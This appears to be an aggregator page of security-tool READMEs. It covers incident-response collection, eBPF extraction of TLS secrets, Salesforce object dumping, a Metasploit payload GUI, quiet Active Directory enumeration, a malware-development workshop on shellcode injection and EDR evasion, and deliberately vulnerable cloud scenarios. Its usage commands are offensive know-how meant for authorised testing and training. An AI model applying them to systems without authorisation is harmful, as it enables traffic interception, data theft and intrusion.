Pentesting Reporting Tool (6)



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. The first is summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second is complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
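
A minimal configuration sketch, based on the option descriptions that follow (the module and class names under collectors and unused are illustrative assumptions):

{
    "collection_dest": "~/collected_data",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector"
    },
    "unused": {
        "example": "ExampleCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}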

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use; a sketch is shown after the method descriptions below.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the superclass Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
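
Putting this together, a minimal custom module might look like the following sketch (the module, class, and artifact path names are hypothetical, and the import path may differ from the actual project layout):

# collectors/mymodule.py (hypothetical custom module)
import os
from collectors.collector import Collector

class MyCollector(Collector):
    def printStartInfo(self):
        print("Collecting my custom data...")

    def applySettings(self, settingsDict):
        # read any module-specific settings, then hand the dict to the
        # Collector class so it can apply global settings like collectArtifacts
        self.myOption = settingsDict.get("myOption", False)
        super().applySettings(settingsDict)

    def collect(self):
        # write summary output inside self.collectionPath, using a filename
        # not already taken by other modules
        with open(os.path.join(self.collectionPath, "my_summary.txt"), "w") as f:
            f.write("example summary data\n")
        # queue a file for artifact collection; the Collector class copies it
        # into the artifacts folder and preserves its metadata
        self.pathsToCollect.append("/Library/Preferences/example.plist")
        # let the Collector class handle its responsibilities (e.g., artifacts)
        Collector.collect(self)

It would then be enabled with an entry like "mymodule": "MyCollector" in the collectors dictionary of your configuration JSON.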

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first, called dump, aims to sniff network traffic, associating information about the source process with each packet. The second, called tls, makes it possible to identify processes that use OpenSSL and to extract cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies, including non-merged modifications of bcc and Scapy. A Docker image can easily be built to test peetch, using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be stored to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying processes that use OpenSSL and makes it possible to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process; the --directions argument makes it possible to display the exchanged messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
-> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets argument will display TLS master secrets extracted from memory. The following example leverages --write to write master secrets to disk to simplify decrypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 --http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go


A fast tool to scan SaaS and PaaS apps, written in Go.

SaaS App Support:

  • salesforce
  • contentful (next version)

Note: the -o output flag is not working.

Install (requires Golang 1.18):

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,ContentDocument,ContentVersion,ContentBody,CaseComment,Note,Employee,Attachment,EmailMessage,CaseExternalDocument,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the record id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set record id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example:

cirrusgo salesforce -u https://localhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirrusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler


Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

For developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For generating an APK payload, select the Raw format in the dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused by the usage of this tool; it is for educational purposes only.

Twitter: @iFalah

Email: ifalah@protonmail.com

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a lay of the land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed, it will attempt an anonymous BIND.
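
Conceptually, the single-query approach looks like the following python-ldap sketch (not SilentHound's actual code; the server address and search base are placeholders):

import ldap

# connect to the Domain Controller (placeholder IP) and attempt an
# anonymous BIND, as SilentHound does when no credentials are passed
conn = ldap.initialize("ldap://10.0.0.1")
conn.simple_bind_s()  # anonymous BIND: no username or password

# one broad query; all parsing (users, groups, OUs, ...) happens offline
results = conn.search_s("DC=acme,DC=com", ldap.SCOPE_SUBTREE, "(objectClass=*)")
print(f"{len(results)} LDAP objects retrieved in a single query")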

Using the -o flag will result in output files for each section normally shown in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r--  1 kali  kali    60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r--  1 kali  kali  2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r--  1 kali  kali    89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r--  1 kali  kali  1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r--  1 kali  kali    66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r--  1 kali  kali   529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon


Passive-Recursive DNS daemon.


Quickstart

go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use the -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android 9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS server (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)
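
For example, to forward queries to an upstream resolver over DNS-over-TLS while storing PTR data (the flag values here are illustrative):

PR-DNSd -upstream tcp-tls://1.1.1.1:853 -listen 127.0.0.1:53 -store pr-dnsd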


Maldev-For-Dummies - A Workshop About Malware Development


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.

 

Workshop Description

With antivirus (AV) and Enterprise Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just as fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio), and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop): Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc /unsafe filename.cs

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool


TerraformGoat is Selefra Research Lab's "Vulnerable by Design" multi-cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID | Cloud Service Company | Types Of Cloud Services | Vulnerable Environment
1 | Alibaba Cloud | Networking | VPC Security Group Open All Ports
2 | Alibaba Cloud | Networking | VPC Security Group Open Common Ports
3 | Alibaba Cloud | Object Storage | Bucket HTTP Enable
4 | Alibaba Cloud | Object Storage | Object ACL Writable
5 | Alibaba Cloud | Object Storage | Object ACL Readable
6 | Alibaba Cloud | Object Storage | Special Bucket Policy
7 | Alibaba Cloud | Object Storage | Bucket Public Access
8 | Alibaba Cloud | Object Storage | Object Public Access
9 | Alibaba Cloud | Object Storage | Bucket Logging Disable
10 | Alibaba Cloud | Object Storage | Bucket Policy Readable
11 | Alibaba Cloud | Object Storage | Bucket Object Traversal
12 | Alibaba Cloud | Object Storage | Unrestricted File Upload
13 | Alibaba Cloud | Object Storage | Server Side Encryption No KMS Set
14 | Alibaba Cloud | Object Storage | Server Side Encryption Not Using BYOK
15 | Alibaba Cloud | Elastic Computing Service | ECS SSRF
16 | Alibaba Cloud | Elastic Computing Service | ECS Unattached Disks Are Unencrypted
17 | Alibaba Cloud | Elastic Computing Service | ECS Virtual Machine Disks Are Unencrypted
18 | Tencent Cloud | Networking | VPC Security Group Open All Ports
19 | Tencent Cloud | Networking | VPC Security Group Open Common Ports
20 | Tencent Cloud | Object Storage | Bucket ACL Writable
21 | Tencent Cloud | Object Storage | Bucket ACL Readable
22 | Tencent Cloud | Object Storage | Bucket Public Access
23 | Tencent Cloud | Object Storage | Object Public Access
24 | Tencent Cloud | Object Storage | Unrestricted File Upload
25 | Tencent Cloud | Object Storage | Bucket Object Traversal
26 | Tencent Cloud | Object Storage | Bucket Logging Disable
27 | Tencent Cloud | Object Storage | Server Side Encryption Disable
28 | Tencent Cloud | Elastic Computing Service | CVM SSRF
29 | Tencent Cloud | Elastic Computing Service | CBS Storage Are Not Used
30 | Tencent Cloud | Elastic Computing Service | CVM Virtual Machine Disks Are Unencrypted
31 | Huawei Cloud | Networking | ECS Unsafe Security Group
32 | Huawei Cloud | Object Storage | Object ACL Writable
33 | Huawei Cloud | Object Storage | Special Bucket Policy
34 | Huawei Cloud | Object Storage | Unrestricted File Upload
35 | Huawei Cloud | Object Storage | Bucket Object Traversal
36 | Huawei Cloud | Object Storage | Wrong Policy Causes Arbitrary File Uploads
37 | Huawei Cloud | Elastic Computing Service | ECS SSRF
38 | Huawei Cloud | Relational Database Service | RDS Mysql Baseline Checking Environment
39 | Amazon Web Services | Networking | VPC Security Group Open All Ports
40 | Amazon Web Services | Networking | VPC Security Group Open Common Ports
41 | Amazon Web Services | Object Storage | Object ACL Writable
42 | Amazon Web Services | Object Storage | Bucket ACL Writable
43 | Amazon Web Services | Object Storage | Bucket ACL Readable
44 | Amazon Web Services | Object Storage | MFA Delete Is Disable
45 | Amazon Web Services | Object Storage | Special Bucket Policy
46 | Amazon Web Services | Object Storage | Bucket Object Traversal
47 | Amazon Web Services | Object Storage | Unrestricted File Upload
48 | Amazon Web Services | Object Storage | Bucket Logging Disable
49 | Amazon Web Services | Object Storage | Bucket Allow HTTP Access
50 | Amazon Web Services | Object Storage | Bucket Default Encryption Disable
51 | Amazon Web Services | Elastic Computing Service | EC2 SSRF
52 | Amazon Web Services | Elastic Computing Service | Console Takeover
53 | Amazon Web Services | Elastic Computing Service | EBS Volumes Are Not Used
54 | Amazon Web Services | Elastic Computing Service | EBS Volumes Encryption Is Disabled
55 | Amazon Web Services | Elastic Computing Service | Snapshots Of EBS Volumes Are Unencrypted
56 | Amazon Web Services | Identity and Access Management | IAM Privilege Escalation
57 | Google Cloud Platform | Object Storage | Object ACL Writable
58 | Google Cloud Platform | Object Storage | Bucket ACL Writable
59 | Google Cloud Platform | Object Storage | Bucket Object Traversal
60 | Google Cloud Platform | Object Storage | Unrestricted File Upload
61 | Google Cloud Platform | Elastic Computing Service | VM Command Execution
62 | Microsoft Azure | Object Storage | Blob Public Access
63 | Microsoft Azure | Object Storage | Container Blob Traversal
64 | Microsoft Azure | Elastic Computing Service | VM Command Execution


Install

TerraformGoat is deployed using Docker images and therefore requires Docker Engine support; Docker Engine installation instructions can be found at https://docs.docker.com/engine/install/

Depending on the cloud service provider you are using, choose the corresponding installation command.

Alibaba Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash

Tencent Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_tencentcloud:0.0.4
docker exec -it terraformgoat_tencentcloud_0.0.4 /bin/bash

Huawei Cloud

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker run -itd --name terraformgoat_huaweicloud_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_huaweicloud:0.0.4
docker exec -it terraformgoat_huaweicloud_0.0.4 /bin/bash

Amazon Web Services

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker run -itd --name terraformgoat_aws_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aws:0.0.4
docker exec -it terraformgoat_aws_0.0.4 /bin/bash

Google Cloud Platform

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker run -itd --name terraformgoat_gcp_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_gcp:0.0.4
docker exec -it terraformgoat_gcp_0.0.4 /bin/bash

Microsoft Azure

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker run -itd --name terraformgoat_azure_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_azure:0.0.4
docker exec -it terraformgoat_azure_0.0.4 /bin/bash


Demo

After entering the container, cd to the corresponding scenario directory and you can start deploying the scenario.

Here is a demonstration of the Alibaba Cloud Bucket Object Traversal scenario build.

docker pull registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker run -itd --name terraformgoat_aliyun_0.0.4 registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat_aliyun:0.0.4
docker exec -it terraformgoat_aliyun_0.0.4 /bin/bash


 

cd /TerraformGoat/aliyun/oss/bucket_object_traversal/
aliyun configure
terraform init
terraform apply



When the program prompts Enter a value:, type yes and press Enter. Then use curl to access the bucket, and you can see the objects being traversed.



To keep the cloud service from continuing to incur charges, remember to destroy the scenario promptly after using it.

terraform destroy

Uninstall

If you are in a container, first execute the exit command to exit the container, and then execute the following command under the host.

docker stop $(docker ps -a -q -f "name=terraformgoat*")
docker rm $(docker ps -a -q -f "name=terraformgoat*")
docker rmi $(docker images -a -q -f "reference=registry.cn-beijing.aliyuncs.com/huoxian_pub/terraformgoat*")

Notice

  1. The README instructions for each vulnerable environment are executed within the TerraformGoat container environment, so the TerraformGoat container environment needs to be deployed first.
  2. Due to the risk of intranet lateral movement on the cloud in some scenarios, it is strongly recommended that users use their own test accounts to configure the scenarios, avoid using the cloud account of the production environment, and install TerraformGoat using the Dockerfile to isolate the user's local cloud vendor token from the test account token.
  3. TerraformGoat is used for educational purposes only. It is not allowed to use it for illegal or criminal purposes; any consequences arising from TerraformGoat are the responsibility of the person using it, and not the Selefra organization.


Contributing

Contributions are welcome and greatly appreciated. See CONTRIBUTING.md for details on the contribution workflow.

License

TerraformGoat is under the Apache 2.0 license. See the LICENSE file for details.



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing


Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


